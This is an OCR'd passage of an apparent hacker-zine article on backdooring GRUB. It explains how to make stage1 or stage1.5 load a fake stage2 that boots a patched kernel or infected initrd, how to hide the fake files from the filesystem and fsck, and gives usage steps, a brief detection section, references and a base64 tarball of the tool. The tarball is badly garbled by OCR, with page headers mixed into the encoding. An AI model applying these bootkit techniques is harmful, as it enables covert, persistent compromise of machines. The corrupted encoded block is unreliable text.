&& (*(fsys_table[fsys_type].mount_func)) () != 1; fsys_typett+); 


Take a look at fsys_table, fat is ahead of ext2, so fat_mount is called 
first. If fat_mount is modified, god knows the result. To make things safe, 
we choose minix_dir. 


Now, your stage2 can load file_fake. Size remains the same, but hash 
value changed. 


----[ 3.4 - How to make things sneaky 


Why must we use /boot/grub/stage2? We can get stagel jump to 
stage2_fake(cp stage2 stage2_fake, modify stage2_fake), so stage2 remains 
intact. 

If you cp stage2 to stage2_fake, stage2_fake won’t work. Remember the 
sector lists in start.S? You have to change the lists to stage2_fake, not 
the original stage2. You can retrieve the inode, get i_block[], then the 
block lists are there(Don’t forget to add the partition offset). You have 
to bypass the VFS to get inode info, see [1]. 

Since you use stage2_fake, the correspondent address in stagel should 
be modified. If the stagel.5 is not installed, that’s easy, you just change 
stage2_sector from stage2_orig to stage2_fake(MBR is changed). If stagel.5 
is installed and you’re lazy and bold, you can skip stagel.5 - modify 
stage2_address, stage2_sector, stage2_segment of stagel. This is risky, 
because 1) If "virus detection" in BIOS is enabled, the MBR modification 
will be detected 2) The "Grub stagel.5" & "Grub loading, please wait" will 
change to "Grub stage2". It’s flashy, can you notice it on your FAST PC? 

If you really want to be sneaky, then you can hack stagel.5, using 
Similiar techniques like 3.1 and 3.2. Don’t forget to change the sector 
lists of stagel.5(start.S) - you have to append your embeded code at the 
end. 

You can make things more sneaky: make stage2_fake/kernel_fake hidden 
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from FS, e.g. erase its dentry from /boot/grub. Wanna anti-fsck? Move 
inode_of_stage2 to inode_from_l_to_10. See [2] 


--[ 4.0 - Usage 


Combined with other techniques, see how powerful our hack_grub is. 
Notes: All files should reside in the same partition! 
1) Combined with static kernel patch 
a) cp kernel.orig kernel.fake 
b) static kernel patch with kernel.fake[3] 
c) cp stage2 stage2.fake 
d) hack_grub stage2.fake kernel.orig inode_of_kernel.fak 
) hide kernel.fake and stage2.fake (optional) 
2) Combined with module injection 
a) cp initrd.img.orig initrd.img.fake 
b) do module injection with initrd.img.fake, e.g. ext3.[k]lo [4] 
c) cp stage2 stage2.fake 
d) hack_grub stage2.fake initrd.img inode_of_initrd.img. fake 
e) hide initrd.img.fake and stage2.fake (optional) 
3) Make a fake grub.conf 
4) More... 


-—-[ 5.0 - Detection 


1) Keep an eye on MBR and the following 63 sectors, also primary boot 
sectors. 
2) Tf not 1, 
a) if stagel.5 is configured, compare sectors from 3(absolute 
address, MBR is sector No. 1) with /boot/grub/e2fs_stagel_5 
b) if stagel.5 is not configured, see if stage2_sector points to 
real /boot/grub/stage2 file 
3) check the file consistency of e2fs_stagel_5 and stage2 
4) if not 3 (Hey, are you a qualified sysadmin?) 
if a) If you’re suspicious about kernel, dump the kernel and make a 
byte-to-byte with kernel on disk. See [5] for more 
b) If you’re suspicious about module, that’s a hard challenge, 
maybe you can dump it and disassemble it? 


-—-[ 6.0 - At the end 


Lilo is another boot loader, but it’s file-system-insensitive. So Lilo 
doesn’t have built-in file-systems. It relies on /boot/bootsect.b and 
/boot/map.b. So, if you’re lazy, write a fake lilo.conf, which displays 
a.img but loads b.img. Or, you can make lilo load /boot/map.b.fake. The 
details depend on yourself. Do it! 


Thanks to madsys & grip2 for help me solve some hard-to-crack things; 
thanks to airsupply and other guys for stage2 samples (redhat 7.2/9/as3, 
Fedora Core 2, gentoo, debian and ubuntu), thanks to zhtq for some comments 
about paper-writing. 


-—-[ 7.0 -— Ref 


1] Design and Implementation of the Second Extended Filesystem 
http://e2fsprogs.sourceforge.net/ext2intro.html 

2) ways to hide files in ext2/3 filesystem (Chinese) 

http://www. linuxforum.net/forum/gshowflat.php?Cat=&Board=securitys& 
Number=545342&page=0&view=collapsedé&sb=5&o0=all&vc=1 

3] Static Kernel Patching 

http://www.phrack.org/show.php?p=60&a=8 

4] Infecting Loadable Kernel Modules 
http://www.phrack.org/show.php?p=61&a=10 

5] Ways to find 2.6 kernel rootkits (Chinese) 

http://www. linuxforum.net/forum/gshowflat.php?Cat=&Board=securitys& 
Number=540646&page=0&view=collapsedé&sb=5&o0=all&vc=1 


--[ 8 - hack_grub.tar.gz 


10.txt 


Wed Apr 26 09:43:44 2017 


10 


begin-base64 644 hack_grub.tar.gz 


H4sTADW+x0IAA+19a49kSXZO7i6wZK1tb 
LW7q3p27I7m7q3Mm1V30199b622318w20gjxwOghIRKLI 9vViAx] 
EDIICRAW5 jzieR+ZWdWvWWledxXTivffEiRMn 


V1dXz9Z0d!1 
AAsjf0 
Tpw4EX 
9fpG£bOgN] 


0254kn 
fmcgihx924 


D4i5 
Hi3D0/9dg7jcY 


EQ4iGwxCf 


4fSeYaxyM 


tuG8UhcFwe 


FOQvExM 


w/BTkt 


i9JyvYy/gYpx1Bfl 
AK5DdsIrkYX0OUix 
UZU/O28HT 


TOORh7E£ 


WKnwDda 
BFGI 
A 
NnRNeMr 
j+m6u/P 
tay/SFrcL 
VwlmMKVZk 
i1BFIGV 
tAIdD8YgG 
rXvKZuCAw 


Kp 


OyNAjJmeoc8kaTulyOfZ0lWweggCCq2krW1RCM04 
gwwYvmGrhpi 5WuHSBM6kRuJZODOTAVE ZRExXMBNY 
OJukUtGO2FmvzJBVasZFO0ps37xzugp2] 
1gIMZTWt+rNmj5Rsnp0yHN/JPujTwkSsi 
pWasgmfVXFxI2zvxX88tKWqCmhOg5HI7 
g5mQh 9pwo jyZmUUXrMoZS3qFA 
e7B9IB41RcfWqkO9WOg9r J 
CnoAcPJUvb6inKBF3 jpzqwsVdvb jkeCh+4 
E/50PRQOD4DY+W6VONFt1 
RjazVJeSVp4W4xIWYcaVLJQibjP5TI+r2 
ExDlkaJ07i6qVv5VfEIbp6ka5upaaOrPp3C7Uc8bUzZxXK6sT 
nW1llors] 
b5YUwWSZSqZNUi4LF6y5 
W81/749trx02kv2WdRIuc9Nr/HO1Ly21 
pfhJZLALQADGOLP] 
BN+oONb+/dZbI8syx!7 
rJ0zZ69Z9DxCcXCUyU4 JLRY/ iW 
MAMsOJ9tTFlsgqed54r 
K3VBcfwv8Z8N7N/eMjyASca5Q0zuF] 
sglseQU1LbL9+sWr 


Dol 


O6uZOGOxSs8PzMu 
E+GLOFxVIJmU 
9IrgVOFXgv9ag36 
Uytm2sFN 
Gaiu4 
UWpt+J 


kel 


XlnJbs 
NouzqK/wt 
tCRx30E7J 
9VOpyv5PE 
RI 

1 


WTxOhols 
K6x5suuM 


U 


mGZ+TxyY 
Aii955/ 
7HyjFsS 
fFuW52ga 


U 


xcqwCjB 
lVriFg7m 


5/X] 
kedl 


PuAFOn441 
rgJVcVGIOPwikKC98aRWNNet XRdhcKFI102A 
UulRIMgLhxQ6wl 9N1VUXvek 
LdSr22VnYDUp9c 
hTqwj1GZZ/X6xY 
EiRgOfwftgKvPyC+ 
S1018DB8tKLxYQO0s5KYiV10Zmpp81 
7/cCUSZFZHy 
PmGm4t 7R 


nViczxNy4nzP 


B3KWded 


Pgm7o0yRv 
FDBkJ9fNqsuSMFQ jqhfNBbdJ7BY5C9VBDI3B+j3Z6ayWSeSqwAy3nvGskd+C 
R8FQvdXdwNO10/VPtD4evcWI2UZMXL9TOrFiukOXFbYyFmfZfum7x 
Aj2muLOBstSrJdQc 
EAN4SaFBixshV310qQTP383F/RrnKFKWkXs8VU 
2UfiBkJf£38SeCDzxMGtVv8 
tMmp5H3v/t 6ud2fvOQMoceiLIJsUMM0oDFrkkF 
Ll 5GsUOWJMme 8v 
LTwtqkYxw6gtl 


8AYOOQ!I 
ngq4xXxdtVq 
/EqIQ 


n7NE 


il 


DQajJSXDT3v+1Xme6/YPno5xXWaymjVq/VNt 
c9p/T7dp6fdNq/02Ab6xvXiul2muhJIn 
h2Hq+OzodBjI/N80UU 
P7t xpd J IASGYADApB 
FhGH1LxqM+4ip11xY8IDY1t/tbpTgfVUIr9uNg+Bx] 


BAVHxCKqZnuyczkKqsrMenRN5xXTVv 
L8 


67VrGxvwl67kX/pdrzU269fWrtXWrxVq 
EX 
H9mL£/u2G/1R23A/FhHPGqHg5WzGwvO 
68F4FHZjfLQOAHB6FLRGPonFrJIZ+NPLC 
f73TSYADTHux+FpP2iLsD8q 
lclLXFZ229aQ7 67 9WxVLY 


ay 


a 
E, 


EpSgq 


RooaVdZXx 


a 
ry 


x 


qOVIW 


Z 
7 


n1lol 


tssdvtAthA5MjSV 
1pZ9xo0Hj+o0x0s!] 


HAd 


1KF 
Kel 


RaTOQYD714 


D4A+7mhYxwObqxaz 
Ekp7SzswOxQV4gPKgbkuGmxk] 
EPYVU7UBSQyYyN3 4 


c9U 


qZpNjay4 
R44 


1uYdzvUUy 


Rjn2G 


Gr 
bE 


OAdwD6Hbm 
giglBQg8 j 


E4ienZWh1lLhp4 482 


Leu 
KrulSnJYv46eJdZ! 
EyYcGwoFmcrGOv4uU 
R/i4pgs4wAoFD3G31X 
hO6ixZaVHGqdKIwl 
1ApuqOROkGOmMygFSbKiimemispDguyiyuR 
KBcovlKkIqOXKIrObIk5UbIWzNnilTdmlE] 
EyYODUOGNiid5aKnpé6Pu7BWIpSflMyaAmCLJUZW 
RyZtT1FyLDXIQanDRFN4mmZ0DW2 5QuWGHpW304TAY+3bR2/vGwl 


EyDtu 
RWLD995TJEZ 
nKOmnqOlaBsTZVdCkuLW 


ExU/OUYCnXS4 fCX] 
EZqLTm7QjsqrbxjZ/5w5u7SiOY9+35E3SSrut 


E1s5GdDZ8gW7cScUg2U6sb+Jd 


tDJs3pyqMoH 
byLY1 
LIMScLx0XtCJFnSGj/Abq 
W7M2aeeQ6zCO8aPXKarGkGHeujmz1lijssqi/yAVGJ2eFrDv1l6rKWs12UuiF 
LtfTraWjLqhHzNzewqxcxGvlQbJ4 
KpW j5PMOdx30Unwlgjk175rZbBOkDIgj60+4 
YNPJ1zBJotngl9KRZEkGINpeNt+ 


t+NOvumAu7RJ 


14U+GO0smPDLf£PB/HABk6éwy 
Pxkd3sXjrqxucaHYh1+IAoHl 
RCOOFVcZbxVcbS397F3tHdcXigwi9ev 
UPUy1/yWyid6091QjXFkgCO90E9RaSI 
EGOIMDx+Fowj4E0y+SvGY67/a2JyqsNwW 
Eg9DIrsziErMJhGKD4XponC/tFRm 
LISTKD/D1qzUJ2hn0a9IWALOYKSK5ir 
INSISY/F42EQeSdA0mNROZSEAOdrB3Gr 
RYVEAtApJStZLrP8vgOokL2ng9FA 
Pi RaFoQ97BMOi XFEhVHHr3b33/vsyK 
EViwtKUylt jelZ4m5fPnpwb+++d347 
hrUDOhIJwEs34i 9nn8KY90718Xep8cNn 
nYSzgX38AHYDyra5Ro4ejcNBfE 
OijTIpgQtqBt1VR 
KN3a09qVISHNUwad 
uLcGqv3ZJ39+akmI ZVEF / 
nSkXyaLOpxVpJwoC 


= 
ry 


5 


ae 
G 


+zZqQNhl7Yf171H2Brw422 
EtQNhB6aq56BOkGLOJkqp 
| /wt 7gOZKG1RgVSRelCyUrL91TSGP 
[SxF LCGPXMVONENKyGhm0gmJMqkIM 
Fthw6gvhV1lsOvsB4jxBCJT jt 6MGK 
LkOEnioN8pUiizMyyQOK 
he 
tmAePxVz18iwjVxvs7rxVOsSNdhvD 
HseyfhqOcPZ9Ju 
Pmgl5tXX/GxdiGjZthOkzMCVVtN 


pe 


tEgG JKMYVqgoCioic 
DLWi3TaibU 
[kvl 4G45vbY7HkD 
Rcez9xKdftNaox22EU 
HTV£MXqhpT6o0cxcjy 
PRHqOEmctqxmxNKhR 
UGdjUooT2CnbLXBGHrbTGxlecbl 
IMs/uWze8cXr1lFnlvkF7N4TyXpBsA9 
E4XvVkLioRxSv8 9nt 6BLyRL 
[Za9d+XdXLkaOHpRn7CEFPEbWXatfR 
ndlGWhwW23qBmCa2zw 
PR 
tcKdud/O00MYx+W6bxXO 
tgcRIXaC7VRDkKBZloZw 
hjGZINX9lustmkBxVWFYu8p197 
PBAB76AHCWRGLOQD1Z0/4pLaKkZM 


lpIvws/FtlwNOrSr4 
lm1Mrw 


= 
G 


R3kZStZ1yTE 


LyvfbD5qCraifu 
[quHwjZPQPVZZ 
Ity7R/c4gy 


s) 
h 


RAZVu DZD20OPLBBT6Y5KQoBsHmmzk 
179q3BpXqs/urx0VOxd4kpe 
RULYQSgVqGbkKEGWK7uopt 4Xel 
HaZNicb4ku3L7/gdZlljakpy 
4e31K0crLn8k90m2ejS2pxd 


DGerOXEGJcoiRVOhg4qGg 9G 


b 
a 
Zz 
O 
Ss 
Q 


HkbQ3Kbo j 
jZSVHHC6V 


WyPRoFWUz19Imt AXO0GDVZKgGv2hz273TyoluQw4f1 8W6BZwlogpLM635ryff 


Tmw/clcqpwcIrToup 
fz06égbwxvftgCcWrn jf 
li IDENZpTOSMpM931D+YagcFK/qlq/4Lc 
2RNPbslbwDS/oJlunMxkbFOQ47b9agQZjd4YrSbOdHBys1Sew 


OA+ 
nxXG] 


PJUp4Dc 
+ZDrd8HkBrS+1Yy7dsirb6éyiqty78Ns5pbMZxw 


K/YVa 


D7] 


jcpVyqBU jD7EZXzyzc3Q1UQ5AXZQTGR9 


ry 
E 


MwSbaZncTpnri82220XIekF 
Rasoyry60dqH 


10.txt 


8tVopHeJEhisLSIJUmgly4Y+tnyl 


Wed Apr 26 09:43:44 2017 


11 


TFen4YtPDtktig2kGsH6OszNIYZ6yLUGU26 


8SxP5hfasSI9Y9FmTKqu2mjP3D9SPt luXrKP81FSXZNtT/WUdvZVtoauk jU9 


rVDUWNJE2GGmtiv3PwZvTAe331 


[Imy20h17AWnnSRVOxtrOt 3UinwdJ 6dMt 9m8 


mkJQO5pBT+O16F10R51WOq8b9pV/tXL5zPB5mdS/uetAvuQuJLuUsqOp7F N 


/DUOUVFyNMhx8tnTObIm 
bBUM£5ROT 9XGFW4HBd98/fpZsZ/LkW6TOspKt 


Eiblyyp2NLK7amCqzdx8XM2/LTW 


FOsdyxjpFyUts 
EC+zgwvrb+nDraZShoXwiwe 


vXnlmVoto3NycdAaDSJyXDHHzby+ctGk/3NOnm1 9menw6erRilWOUAdoJQC8 


8rSPglrMVWcXk70Xmu3zqlCOl/ngimtx 


UVpO+ J 


Oo5CVP 
hfZRky 


r 
1 
b 
3 
H9T7EQW476 
M 
3 
YY. 


+xinHT 
OdqzDm 


Z89r/G8 
O3f£3RH 
M+63ysxXS0 
4 


RJ 


WA8DRou 
LH1xXb4r 


UTD8Q0rR6éw 


pmCzbj33z 


Wnm 
EFawBcYy4fYO7f3 


HUQb9KVCLrmnncAnvyl 
xUBOJ6VpVEfg6Wybp5u9FRuerbMCMbiitBO9 
Br61TQui50ZVmvQaZ4SIniUGdaQ8DWNEx/na 


IT9QH 


jkd+JF/ebu/s 
£7e4G1XvNdA6z5R5e 


F jL£nu3s794/34/cMDYGu 


OHYLutX6JGg31gBHt 


Euhkw6ct 2WRhOX1w+CNgDxI/SnwZ1TQ4 
EBoxvJxePupJEa9o2 


H9IC+7VT8CBs+Dw3g7 


NOoekRixZrr9LF jtpCgf9y2Gww/wp5d 
BXS5g31JgH52Z16fdTOaUW9J0BcvOujlbFlep84S8sJA8eHal 
nXPbneH 


+p/yqF/b 
/9QrG41mL 


QNGXMqP 4 


EV1lpcuQOMLN7p jd 
UDeo73d48P79ITozw40qlak 


[TI7/sI7RHmT8h8al 
[ThxHzpQ233WAaXSTWYFhXE6IZyE 
Lle7VFYul5vb0O1397c 
Z5MF/Zhbt£8k9ihIM/AIcQOlig 
D59abw0/ueAlv9/AWULr42£PG 


xXuFFV6Bd8mtM7wpol 


PmZrHxrGdi4 


jtquiCcnSgeXkFFKO 


Dxreu 


Dk15b0jDXVwlbRsbIx 
R4Zx9NWteebtSryGnrRcBy 


fTHB1 


L/dlokU 
7TIrgI 840oM1MLyX7Nqz/k5W9/My40OHF cSwjAwApoM 
WKoisoLd9Gv/NxXyb+g/71yqNaAl 
gfHT zw jg4f3N/dW7hw1 
HmTCPhvquK8aeUPWz1Gu 
+BxOq35G6xA+NMt www8AcGA}J 


LOsX/WNus1+f£x 


9VTDTnboO 
h 
RItTXi 
UYa43h 


E9w7w8QfJx7£37+wdwZvl1lzDcH 
Fmt VVrHP1pUoP7Tqv 
DskiveDIcGmwMGD 9RpT8O0ITK3ulA6ySwl1l6 
20/dMApWbQhxGMix9Gg1lOAwYxF 
fwlA3pZQEFs jMjcH2 


EISMEiP5 


f+WibrOLz 


RvtyhvR2alX1tCgHIV 
H9dhvUwnpVESEw 


D1r2845+ 
4FrP 


HYLZNyUR 


/gEsWlrctr0Ow7Lwkbf+QD/rzF6yCXeqynSJxXpJteJOIBpJ1oFI 


GtatdYrTa93Yzqw4Z2ttlij9IVetpl 


£NA1jrxn60DCF4/Vd 


H7Oub9P 


EOtR 


PZEGYJ101gj4005 


jim jrZ4+H 


FU4VpyP4kX1Ng0 


HQ 


/eGD9cePdxgvVT8Uu 


LZGr63N 
IVOH 
QHLawuz4 4 
ZWet 
83mm 
XZkkffWy5 
ThSsOhhmyn 


cu5Tvzs0e 
nYQhKySBM 
BBsLaxoPJ 


zCRagzGjB 


RFv3 
oAaf9cl 


Ojskdxw 
GnVb jM4CcgM 
Ed70 


G 


kKUEED 
PSg6+6fw70em4B5 
9F JaxJapHTbUCx48 4 


H2Fdxz 
Z2nft 


Urh4cdVwasc6BAl1Os 


6MbkpxoKY 


QJhH 


EI6ScnQUNDamx0Y64Zqga 


ZIvd 


UNmYRGaD6SwWrxJuA7aelEuu 


VRU3eF J/ 9SqvTOaBfWhxXC6DTwHq0alBOApqoU 


LpOAZUCnkH 
5rLKaKWNtWpbxULf3ByMsq 
HZ3TYLIZXAp1Ih7+YZ6ydRMO 
H/ £fE9x7cvefdOzyCkY5+3t6/f3RclTdgchwe3FJI3d3a0 
ihROQLO/xqtn0ag9ZHLF8kFI9qQg356a 
hA5akXgt xUVZFOKBI 
1fgoUee0xfnARi9OSmA6s0b+LXYhAp 
XodwQM3eKZ 
H6bxcgae9btgff7HcWNlcqdex 
h5YJkdAet+VTiY 
H9/IM78p112TLCd/MyW8K6éc 
HqC5E2pRwaWnJpMqlgQ93Z+Xuwce 
7/q+H/Wxc+XT OT 
xeB50CrtfboP 


EwSSpkAil 


9 


Uz5A4G0 


D9y j8z7 
DOLHMxc 


a 
H+8d4Kx 


Agtj 


nOE8pM 
kKASQOMpOCXq5TJ+ jDODHmolWp7nnRaSz2Vzy5G4 


luTuFk 


Drt 8KqoCJ 
KNukoas9U 


EdAxT4JIPA1900Vr 
zZ22TzWq0+WYaFaCgqq 
hmlwhFR7ykrR49EV+ 
howOfFIJ7sifHZYNxtY3y/sI2CnRC1GMcyzVs8 
E60d/TsP7u+VaWWJFZ14jV+eb! 
P12gCfSeDJqly3SPtDjcCjq8YgU 


UOxfc/q70vVVNO2ddMOhp2i 
KNhCuDa3Tsf5 


RE VH3zMB 
KIPaZTpP 
PMwrNFg5 
Hz/ 


nkcOcVEL 


lXpwWxL4fVXb4MuvBZv6kY5Tx 
/SgiRS+dfzhbL+ 4B 
PiKesFOwMBCHP2X0/XMZVOFyaphVGuTmxXJm5B1kC6J05XV 
FIDSTK6UJEIPUVOVBgD88g0z 
E2GI+HTMNPRmYkzrg8 jAz 
uLyWVbuZ6SSX5Z+5 


P 7qh LUUK 


PB 
K9 


hBv3tOrqGkNMgkKskVmKqI 


VntrjbLweXA6CU7DPmopqjTPg3Vn9/pOd/JOpw4pC2qq+1k7qL04ZAut+2ryB 


/D/81IYJIJCB1kGiMhmzdqxt dgm9QrRd 
zVVLIt2YF211S/FqvRpm6V6le1lW42E 
6es5P6L70+yx1BPoVUwaGbUv9xt 86 


TzMXg7VNk 


HI 


EigokmU] 
K7nIlily3 


sSSaDkPR2SxVJIJ3S7ZNIVEF2 
shhebSNZmo jpkGPcROGnBdw 
E+FKoxGfIdKK8Pk/tSCroQq 


VyhVqCB5C3JTdguZrDUvo jJRn0ZkXUJkzaMzZFeZstnkqulzg5QDULbTsm1KV 


GRoxQyFaMYms/ixSahAnbNbi 5KXWJ 


nNXJvWpKoougM5SO0cYzCRLh4sMSMoyG 


TJa4yal0Mv1iwf31Ntq6eeXwTlfp6ReNFh3sdyxVegxnYi0+bb jJBSU8PSYKRE 


Zm16YrTNvSiCaQxYiogGNfqVmM/nK 
E9pPYOUSDtix2PGpd9kg 
Dz7KsMqZIVeeMyr2tngX2jXsgPaVoxE 


yycLNMDSUy 


GYcnNEY1BZN14SgleiruqpwlIVNmYQ 


M8vQOZth1lkOTnS+aRhaYYrPFTuD 


HTKH9xv4t2] 


KS8g4iofD 


tculJOK1CQ21gbVIsSI/y5LIbFYcz1J04cMN 
ZNoud5daXVoFpWiCqNpO23skRyuqqffyHY 
plu2oFlyLtCKZH4om4F+p1nWNHHTZ8CI 
1XMd2oemvc5TwZ58bMiDtc8HjqBv jMI+reH 
EzagdPSxvYHMy9C7SImCC4dmv] 
h9S3wb/ 6NF+AwQVxPK8rFomgUBC3J 
4Y¥m2j3/VACD1I5nP 90qtR3k0aE 6mICUMGK960z7GY70kKkNXyVW1/biRv55XIE 


/EZJIGM 
a6riDG 


jcVeWi 


sySC2QiZzB+Wjq8Ad6zRNWtUZx 


PV 


WwTO 


6 
Q 
1 


a5Sbbéawy4 7 


K 


hOtk50+q 


IwO0KCU9SthVRgWnNM4 3S jvj1kBukTuYy 
RFH1bSeT68w4pxaYU3Ku2GnHxX 
TBsbmr30+KSDU6MpZT1YrFLN4rIq 
IGDVFyb1VUWSPZVbVJILsaJrJOzScSz 
Rz/ez1lsN3RPkIPvI19ARXqtW 
LhNM4b9YSWs305P3xFfRIMstbwvFSOVB96O0rh1oWc51dSBa 
kdJUWIcl1y5qOHt UdoBJbIVnVYA782bIxycX 


TErb2b 


OlEYT 
PCk 


ESSL4UtXEC 


ES7sxXr4+AJ1Dnx 
E0gt /OFUZV8ArHq38 jbP9X6zVF28 
EfPiAIrqwWix84Z8dgl6tWID 
HBZeE1LL8bdqgz40wneMHmuV5 
idQ2EjrcTasSuysoWRvhYaqs 
RnelqkiYxlCOQfQjC£C7CruUxp 


K5 


SrHwCwIwYPIP+0Ac1/CygtXJp 


10.txt 
t+pycC7DnfPq8CLzp  jWmxF 6d 


iV5reo1l2FMIluyyU 
/qbFByCO03LQd1icm 
YYfgVI5XOmWXXNPNb3ne3 5+d 
C+mJ£BXGHLnFy jm7zmeZ6DRU 
ztRflrtq/77vwPojJ 
EXNAy/3j1Z9J7pOhBFT6et 6ck 


hANDtenr5eq 


03/yDIm 
OkvrD9rZA6NUUG7 
e+tu4o00OmMsS 
wVSegE1SKT 


1Zr1N 


53aDazsAiAbYddOwSn4 


Wed Apr 26 09:43:44 2017 


EOKrQZG/dWjnAjhY92 
O0Z8tqQq/Gw908hcC 9YaT4GyvrhEHuDz fA2GmdBbGIz2ESS/Woirbf 
28yUhmemNCkPOL1L£SNKO7wrA+TOBSbTOzIJCDurEjmt+YJI 
HTinWccD6a0fdILQ/wN1LX8thd/ 
EyH+cGuGIvhZ+wygy9 
Ue92v5K1Bcxpz2a2r8 
9IJMaRKK2 jYA3qBskba6gJijRIOLN8zxKTKhqeRgiHkml 
kGrGx jh/IJ+nibeh8KnAPGiAH3THObOQk+thUtu 
hQy/emKMOjs9/J4524L47T4 9NANyDH54yxIdVcOZuwoYkXoFvRqDzp 
8Tt98giap8 7putiZxZDFyVuWouTA8GYGrrArFLizoSVPo 
H+1NFwCULhFLODX8zLGVqtv8hq+/FaEk+nKcl6x0M/KeiJdQeaKkC 
EBJYHixoZ6eCJ jGygA69UhpoJsS 


12 


EiCY9mLOQ 
64twtIKA 


RjJ78R/7LySpdle9bgi 
RGKBLTGvuw0QvuBJKL 


FbOTOgé6éXgkcH2ZobxXqNs 


yq3Idxx1lJMMwWDVYUockEpqSogfKfodx5DDgAW+cQcGpkvG/ 68JRbTJawxCD 


EfLenNUass 
WOSZK7NZKVkWitt 
rUJHEKATKE 
QsvkOnByj 


JIRVI1Ir 
R | 


DIXnRI7bIIZWXrU3 
KMRTP 305B8bWZP41x 


LmROkqqwW0 4wqmh 


EHMp jAsan8yuaWy 6t ZuzTDI5FgUqY1 
B4t 4g6hk 9Vu jbp+kH6JGRnx24COrnye261e4R/VkSX28 
ESACOB//Y7oyCin9ixnC3j1IVr2m 
HOQjJsXu77FxmtdjzXyK2aVdhg/1r/TVoel 


koect1Vv 


pOhBmV2zob7h+el2FMOx2cANUFBS9cAbDkCjOULNVvkgaHnXHLZGw4+WpbNT40 


JcYBV4XVIc2Fy5nm6bcfkWMRzSBwgoH1058tA0z50XnKyYhPDhqwi 
hio/DObPTt 3GFK854 6YtQeD0UJApowd 
U+XWdatiLbRVCbXR99xci4u3vzfq40kmqwt2xsQ2kmiw0LgxKo 


5 


BwlsjoUMJE 
yIl9tRx/2kL 


YOwR£SpO7ugnCwNMH91/cHMRpzSOxwxw6SPOHB BT 
AzomweM6iaSor2zw6oIMjt09x3mn9DP jXAeDUbCAYI 


PRH4hKn 


EM559cPyF£1ESkqHIqC 


s5e6CS+6J1EMN3DieH3 
DQO8gXks6BER9wP/8Tk7 


+9GM1AoYDTgr914jZabCckzGIbOtugqth/vyd80fW/OBen4/MV8R3vO5R1dYFr 
EluTvSaSilPdmdgf4iriS5fxxXC9rjsSrso0a 


rDW9zaYqfETeulLY6YsOhjI 
kq4Ih5m6UfKvXsgb1l5fxxgQ 
YEoft 33H4 
6lgUyohI2Bnkkni/97j4eYKe 
cFvvBZc7il0gXZZcst 


OOFN4 65mzhPAXA/3ROi3mnI 


kDxvIcOw5ki0g/vw40z 


3vF4p1LG 


sDSQU£fUTYdc 6NFmkmRUmMDwCZPKDgOrt+thlLhLBMxUv 
9P/atfWk/g/V5/r/ jVwzxvrKVNJmnJ2zv 


tap1P17T 
T586RjJPxDhVelOizmVmxCidfl 


Egd+1DrDUim7B/mdig3wjqt2r 


NTx2Rndws2V1Lh1Gc6 
jgdGqbkgax21IKQBSM 
QgqbCISZwfGCjcBBoOz 


iPLl4f£YZgnmJgjF 


cYbOQbpKIJKVAKct yX+8TmdIY2TtEm8ohxr 
EZbQOQwJtcge/NJjJXnHi5BxEAO 
jQG 
Ro+ 
nIG/QV7CMLZbDXTYQJ 
KasM 
nDaMRySh30 
+pXqlRlgqeyHlkgS2P3FurVf£3/LB 
hdp 
NniRGj+V548GISNZe8SVVASOSGzJITehqnIo4 
lxae8ylttn4olmilLJNsLs52Gn 
ExmfO3cri5+j0uihcr6és+Gv+U0plFDW5 422 
LtIGWTPJi5FscDGtmjyN6ejB7u7e0RGK2191XJY3dzZn4LyZuxpuN/1 
yPgv9Y3GZoPiv2xuz00/viIlrYqyXrBguF4rX4sRiyY jaYh8UNmaxH0 
Lt+ox7wOmlmDVOmgqf1l1lLpPVkmakg2q7HqiVzhTy7NNtXyobgu7IXRDi2Y2uu 
TmImvEBLmcYiytSgdr7J+4C5K4yHB3d 
e7f£YcOsy+8VBOk18RjJISJU2PWee71TLLOOkKcYC17H 
Eqtvwo8t1x3ihfkmobxX1m5I4KWL4£48+1ICJ/JsWGFpBxp7UH9Ig4f 


R 


K 


R 


R 


ESwuOxGXol 


D 


KRKTE 


haTMa68Ex 


P7epHpy311 


ELPWOKoOD2 
EIKOPBcT4RakgZIYNLK96HQ6F+Eq 
ngqap I 4bQVOXBOYXOEKmVKMUI5QORRZy8qGR 
RJ+HTp/VGUyQvKoNOo02XmrY115pgFapct 
UWrevp82W+H0yJqxpL9coFxKfDpOeWey8 


PmmnxISgqpPallj3t0wjXBb2p43 


UBSFOPi2w441qrmcBj 


HSBN9OnbOhc2B/BYkW8Caqcslu 


1SgXlqsfB+2iGuotqxh/JK7EesZWLBor 


Egq/nz58ZIdnwZXqYqzDWEXy 
KOxqoe 
hC427xx5+0£39zZ4C4IV45PVo 


K1dQTAVXh 


RG£IJ3xKh+16J2Zy31rwt 3NZw 
BOVxXrE 
KrXltv 
UP1/Fr 
K 


tf£q¥1xkB5Z00hI/TOTuyl 5pwMy8J9 


B2£kiEXTHN2xDg88I5v 


130SPhHHZOBOGTuN/udO 
UM9 IJmwF stMkgvT2/M9x 


TUl7ebjd2m502XA0IOF1zMICeiw 
Eolb5y4q9XdQhb0VXJHBZ 6UNBrpB j LuFJispCSFtOK 
nF falmeVwAgsTiktRz9ax9pxw] 
6 7GrUOVWN9QjVQF61G/PLVi 
P8XWey11LTNb/DRgBé6épbt+3wD4xvpGY67/38T1lbtjpo 
terBvMCf£c2YXq76cW85XNvaVN jOHMKE 


vVj1Hbo18b7/vsvVK 
DOrYX3wnaXpxXxWUbD1 
9elt/fpsfddTwiwU/ex 
RK7Hw4bn8XId31IPm 


V2/1loCL£ jal 3Vk5eGYYH6AKWy qve ju2 3Vm40GOF2rZGR1 9+N8V12BEonBKX1 


YgRvPkAmLICdu 
6DH54WeRuCwa3 


xlj+NPeQeTmftF404ssFxMrftos51lJoMQU72/ 43494C/o 
ScT8qGbdjrrbXg6PVuqNpot 
U3252M7UHZx6VpRszQOl9qoeBYw3cifx! 
nUUVNCGJZFkypxSD3Gy 9UQ jmB+023SWt 
6Kt YobOn9vQCOw/D3t+4 
EDPwzeDMfxoOxpF4d 
ny 4xF 9cY fREY8GHT60Sc+TbKWHoJyhL/1d4gNw 
x6leilMfbrBO6DLAPdh7hG4 
Uvnlw8baxiNiwz2/T 
eKI60XuY2wqPn9hYrUwc4M3KI 
KK9+F NCXnG8dgMbRBNVq5SbpHz2yAKc3M1xB2e6HZbe9TMaA+iww4 


ozT4/SA0oqcgl 


NDwW9Dhdff80 
YA4LmPo j1WAGY 
9bqk9 jYFYTuPROGP 
O0G83XW 
KmcU+Li4MJCk 
wAPRAds5SvT370ynyeynU7NL 
R/Yz2pHEG2iJWwn]l 
vZPTSyh 


9iBSsLOg 


WwBPSjp7VN3v0 
uXZaLft 


PeRVBOSL4eGz 


